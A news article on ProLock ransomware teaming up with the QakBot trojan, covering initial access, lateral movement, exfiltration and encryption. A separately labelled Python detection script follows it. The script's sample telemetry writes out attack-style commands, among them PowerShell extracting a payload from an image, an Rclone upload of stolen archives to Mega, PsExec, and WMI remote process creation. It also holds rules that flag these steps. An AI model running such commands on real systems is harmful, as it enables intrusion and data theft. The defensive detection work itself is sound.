ProLock Ransomware Teams Up with QakBot Trojan for Network Access
ProLock is a relatively new piece of malware in the ransomware world, but it quickly attracted attention by targeting companies and local governments and demanding large ransoms to decrypt files.
Its latest victim is Diebold Nixdorf, the best-known ATM supplier.
That attack was intercepted before the encryption phase and had no effect on those systems, but it did cause some disruption because it affected the company's network.
This ransomware family started out as PwndLocker but was rebranded ProLock in March, after the developers fixed a bug that allowed files to be decrypted for free.
According to BleepingComputer's research, ProLock demands ransoms of between $175,000 and more than $660,000, depending on the size of the network.
The skills and methods of ProLock's operators are similar to those of well-known ransomware gangs such as Sodinokibi and Maze, says Oleg Skulkin, a senior digital forensic analyst at Group-IB, a Singapore-based cybersecurity company.
Victims compromised via QakBot and RDP
The researcher suggests that the overlap between these groups may be explained by third parties providing operational support (distribution, initial compromise, lateral movement).
In a report published today, Skulkin lays out ProLock's tactics, techniques and procedures (TTPs) to help defenders better understand and protect against this threat actor.
To break into victims' networks, ProLock relies on two main vectors: distribution via QakBot, previously linked to the MegaCortex ransomware, and access via publicly exposed Remote Desktop Protocol (RDP) servers.
"Access via a public RDP server is a very common technique used by many ransomware groups. Usually this access is acquired from a third party, but it can also be acquired by certain members of the group," says Oleg Skulkin.
Just as Ryuk works with TrickBot, and DoppelPaymer/BitPaymer with Dridex, to gain access to networks, ProLock works with QakBot.
QakBot is a banking trojan that spreads through phishing campaigns delivering malicious Microsoft Word documents, usually to businesses. The Emotet botnet has also distributed this malware.
The researcher notes that both QakBot and ProLock rely on PowerShell to run their payloads. The banking malware uses malicious macros, while the ransomware code is extracted from a JPG or BMP image file.
[Figure: image file storing the ProLock binary]
When ProLock operators use RDP to reach a victim, persistence is maintained using valid accounts. QakBot uses several methods, the most common being Run keys and scheduled tasks.
According to Group-IB, it takes about a week before QakBot gives way to ProLock. Skulkin told us that the trojan does not drop the ransomware itself but downloads and runs batch scripts from cloud repositories.
Lateral movement begins once the operators have obtained credentials for specific servers. RDP access is typically enabled through scripts run with PsExec.
The ransomware is then deployed via the Windows Management Instrumentation (WMI) command-line interface.
Keeping up with the current trend, ProLock operators steal data from the compromised network. Files are archived with 7-Zip and uploaded to various cloud storage services (OneDrive, Google Drive, Mega) using Rclone, a command-line utility that synchronizes data with an impressive number of cloud storage providers.
After exfiltration, the operators run a PowerShell script to extract the ProLock binary from the image file and deploy it across the corporate network to encrypt data on every reachable system.
Each encrypted file receives a new extension (.proLock, .pr0Lock, .proL0ck, .key, or .pwnd), and recovery instructions are placed in a text file dropped in each folder.
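As an added illustration, not taken from the article or from Group-IB's report, the Python sketch below runs a handful of detection rules for the chain described above (PowerShell reading a JPG/BMP payload container, 7-Zip staging, Rclone uploads to OneDrive/Google Drive/Mega, PsExec and WMI remote execution, and the listed file extensions) over constructed endpoint telemetry lines; the event format, hostnames and sample commands are assumptions.

```python
import re

# Constructed sample telemetry (not from the page): one event per line,
# "host | user | event_type | detail", mirroring the ProLock chain described above.
SAMPLE_EVENTS = """\
srv01 | jdoe | process | powershell.exe -nop -w hidden -c "[IO.File]::ReadAllBytes('C:\\Users\\Public\\pic.bmp')"
srv01 | jdoe | process | 7z.exe a -p C:\\Temp\\docs.7z \\\\fs01\\finance
srv01 | jdoe | process | rclone.exe copy C:\\Temp\\docs.7z mega:backup
dc01 | admin | process | PsExec.exe \\\\ws07 -s cmd /c net user
ws07 | admin | process | wmic /node:ws09 process call create "C:\\Temp\\run.bat"
ws09 | SYSTEM | file | C:\\Finance\\q2.xlsx.pr0Lock
ws09 | SYSTEM | process | notepad.exe C:\\Finance\\readme.txt
"""

# Each rule names one stage of the chain; patterns are deliberately simple and
# tuned for readability, not for production use (e.g. ".key" alone is noisy).
RULES = [
    ("payload carved from image via PowerShell", re.compile(r"powershell.*\.(jpe?g|bmp)\b", re.I)),
    ("staging archive with 7-Zip", re.compile(r"\b7z(a)?\.exe\b.* a\b", re.I)),
    ("Rclone upload to cloud storage", re.compile(r"\brclone(\.exe)?\b.*\b(mega|onedrive|gdrive|drive)\b", re.I)),
    ("remote execution via PsExec", re.compile(r"\bpsexec(64)?\.exe\b", re.I)),
    ("remote process creation via WMI", re.compile(r"\bwmic(\.exe)?\b.*process call create", re.I)),
    ("ProLock encrypted-file extension", re.compile(r"\.(proLock|pr0Lock|proL0ck|key|pwnd)$", re.I)),
]


def scan_events(text):
    """Return (host, rule_name, detail) for every event whose detail field matches a rule.
    One event may trigger several rules; malformed lines are skipped."""
    hits = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 4:
            continue
        host, _user, _kind, detail = parts
        for name, rx in RULES:
            if rx.search(detail):
                hits.append((host, name, detail))
    return hits


def chain_coverage(hits):
    """Distinct stages observed, so an analyst can see how far the intrusion has progressed."""
    return sorted({name for _host, name, _detail in hits})


if __name__ == "__main__":
    for host, name, detail in scan_events(SAMPLE_EVENTS):
        print(f"{host}: {name} <- {detail}")
```

Seeing the exfiltration stages (7-Zip plus Rclone) before any encrypted-extension events is the window in which containment still prevents the encryption phase, as happened in the Diebold Nixdorf case.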
Skulkin said that ProLock is not leaking stolen data at the moment, although this may change in the near future.
Group-IB's report is available here and maps the findings to MITRE ATT&CK (Adversarial Tactics, Techniques & Common Knowledge).